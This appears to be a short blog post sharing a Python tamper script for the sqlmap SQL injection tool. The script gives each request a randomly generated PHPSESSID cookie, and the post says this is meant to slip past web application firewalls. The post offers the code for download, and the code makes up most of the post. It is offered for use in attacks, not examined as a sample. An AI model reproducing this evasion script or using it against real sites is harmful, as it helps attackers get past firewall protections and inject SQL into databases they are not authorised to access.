SQLMAP is Automatic SQL injection and database takeover tool.
this tamper can use to bypass some web application firewall via the random session.
Download script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | #!/usr/bin/env python """ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission author: 3H34N(nezami.me) """ import string import random from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies(): pass def randomsession(): length = 32 chars = string.ascii_letters.lower() + string.digits password = ''.join(random.choice(chars) for i in range(length)) return "PHPSESSID="+password def tamper(payload, **kwargs): """ Append a random session HTTP header 'PHPSESSID' to bypass WAF (usually application based) protection """ headers = kwargs.get("headers", {}) headers["Cookie"] = randomsession() return payload |
No comments:
Post a Comment